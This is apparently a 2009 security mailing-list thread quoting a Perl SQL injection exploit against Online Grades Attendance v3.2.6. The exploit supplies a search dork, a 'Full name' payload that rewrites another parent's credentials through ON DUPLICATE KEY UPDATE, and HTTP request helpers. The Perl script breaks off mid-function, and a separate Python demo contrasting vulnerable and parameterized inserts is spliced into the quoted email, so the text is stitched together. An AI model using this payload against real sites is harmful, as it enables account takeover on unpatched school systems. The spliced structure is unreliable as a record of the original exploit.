Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Why do you include TESTED ON: firefox 3? Would you not be able to trigger this bug using other browsers?

On Sun, May 31, 2009 at 8:53 PM, y3nh4c...@gmail.com wrote:

#!/usr/bin/perl
#---
#(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
#---
#
#CMS INFORMATION:
#
#--WEB: http://www.onlinegrades.org/
#--DOWNLOAD: http://www.onlinegrades.org/
#--DEMO: http://www.onlinegrades.org/demo_info
#--CATEGORY: CMS / Education
#--DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same
#              features plus many new features. OG is a web based grade...
#--RELEASED: 2009-02-05
#
#CMS VULNERABILITY:
#
#--TESTED ON: firefox 3
#--DORK: Powered by Online Grades
#--CATEGORY: SQL INJECTION
#--AFFECT VERSION: = 3.2.6
#--Discovered Bug date: 2009-05-21
#--Reported Bug date: 2009-05-21
#--Fixed bug date: Not fixed
#--Info patch: Not fixed
#--Author: YEnH4ckEr
#--mail: y3nh4ck3r[at]gmail[dot]com
#--WEB/BLOG: N/A
#--COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
#--EXTRA-COMMENT: Thanks to all of you for putting up with me! (Love you, little one!)
#
#
#
#CONDITIONS:
#
#
#gpc_magic_quotes=OFF
#
#-
#PRE-REQUIREMENTS
#-
#
#Option -- Self Registration -- Allowed (Default value)
#
#---
#NEED:
#---
#
#Valid parent id
#
#---
#PROOF OF CONCEPT (SQL INJECTION):
#---
#
#Register module (name) is vuln to sql injection.
#
#Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#
#
#Other parameters -- something
#
#
#Return: Change client_id to 'owned' for parent id=1
#
#
###          ###
##***##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...
##
##***##
##---##
##***##
## GREETZ TO: SPANISH H4ck3Rs community!
##
##***##
###          ###
#
#

use LWP::UserAgent;
use HTTP::Request;

#Subroutines

# Clear the console; on Windows also set the window title and colour.
sub lw {
    my $SO = $^O;
    my $linux = "";
    if (index(lc($SO), "win") != -1) {
        $linux = 0;
    } else {
        $linux = 1;
    }
    if ($linux) {
        system("clear");
    } else {
        system("cls");
        system("title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit");
        system("color 02");
    }
}

# Send one HTTP request: $_[0] = URL, $_[1] = body, $_[2] = "post" or anything else for GET.
# Returns the whole response (status line, headers and body) as a string.
sub request {
    my $userag = LWP::UserAgent->new;
    $userag->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    my $request;
    if ($_[2] eq "post") {
        $request = HTTP::Request->new(POST => $_[0]);
        $request->referer($_[0]);
        $request->content_type('application/x-www-form-urlencoded');
        $request->content($_[1]);
    } else {
        $request = HTTP::Request->new(GET => $_[0]);
    }
    my $outcode = $userag->request($request)->as_string;
    return $outcode;
}

# Generic failure message.
sub error {
    print "\t\n";
    print "\tWeb isn't vulnerable!\n\n";
    print "\t---Maybe:\n\n";
    print "\t\t1.-Patched.\n";
    print "\t\t2.-Bad path or host.\n";
    print "\t\tEXPLOIT FAILED!\n";
    print "\t\n";
}

# Failure message for the magic_quotes=ON case (quotes get escaped, see CONDITIONS above).
sub errormagicquotes {
    print "\t\n";
    print "\tWeb isn't vulnerable!\n\n";
    print "\t\tRaison-- Magic quotes ON.\n";
    print "\t\tEXPLOIT FAILED!\n";
    print "\t\n";
}

# Usage banner.
sub helper {
    print "\n\t[!!!] Online Grades Attendance = v-3.2.6 (Credentials changer) Exploit\n";
    print "\t[!!!] USAGE MODE: [!!!]\n";
    print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n";
    print "\t[!!!] [HOST]: Web.\n";
    print "\t[!!!] [PATH]: Home Path.\n";
    print "\t[!!!] [Email Address]: Set value\n";
    print "\t[!!!] [Password]: Set value\n";
    print "\t[!!!] [Target_id]: victim id\n";
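The advisory above hinges on the registration INSERT splicing the "Full name" field into the SQL text, so the quoted payload closes the string, appends an ON DUPLICATE KEY UPDATE clause and comments out the rest. The following is an added example, not code from the original post or from Online Grades: it uses Python with an in-memory SQLite table as a constructed stand-in for the CMS's PHP/MySQL registration code, and contrasts the concatenating pattern (SQLite rejects the MySQL-only clause with a parse error, which is exactly the proof that the name reached the parser as syntax; MySQL would execute it, as the advisory reports) with the bound-parameter pattern that stores the same payload as an inert name.

```python
import sqlite3

# Payload quoted verbatim from the advisory's "Full name" field. With unescaped input
# (magic_quotes OFF) it closes the string literal, appends ON DUPLICATE KEY UPDATE
# and uses '#' (a MySQL comment) to discard the remainder of the INSERT.
ADVISORY_PAYLOAD = "y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#"


def fresh_db():
    """Constructed stand-in for the parent table: one legitimate parent with id=1."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE parents (id INTEGER PRIMARY KEY, name TEXT, client_id TEXT)")
    conn.execute("INSERT INTO parents (id, name, client_id) VALUES (1, 'Legit Parent', 'real-client')")
    conn.commit()
    return conn


def register_parent_unsafe(conn, full_name):
    """Vulnerable pattern: form input spliced into the SQL text. Returns 'ok' or the
    database error, which shows the name was parsed as SQL syntax, not as a value."""
    sql = "INSERT INTO parents (name, client_id) VALUES ('" + full_name + "', 'pending')"
    try:
        conn.execute(sql)
        conn.commit()
        return "ok"
    except sqlite3.OperationalError as exc:
        conn.rollback()
        return "sql-error: " + str(exc)


def register_parent_safe(conn, full_name):
    """Hardened pattern: bound parameter. The driver passes the name separately from the
    statement, so the quote, the UPDATE clause and '#' never reach the SQL parser."""
    conn.execute("INSERT INTO parents (name, client_id) VALUES (?, 'pending')", (full_name,))
    conn.commit()
    return "ok"


def parent_row(conn, parent_id):
    """(name, client_id) of one parent, used to verify that id=1 was not rewritten."""
    return conn.execute("SELECT name, client_id FROM parents WHERE id = ?", (parent_id,)).fetchone()


if __name__ == "__main__":
    db = fresh_db()
    print(register_parent_unsafe(db, ADVISORY_PAYLOAD))  # starts with "sql-error"
    print(register_parent_safe(db, ADVISORY_PAYLOAD))    # ok
    print(parent_row(db, 1))                             # ('Legit Parent', 'real-client')
```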
Re: Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Of course not. I include this information to report in detail. Then... when do you need a browser to launch a Perl exploit?

Why do you include TESTED ON: firefox 3? Would you not be able to trigger this bug using other browsers?

On Sun, May 31, 2009 at 8:53 PM, y3nh4ck3r (at) gmail (dot) com wrote:

[...]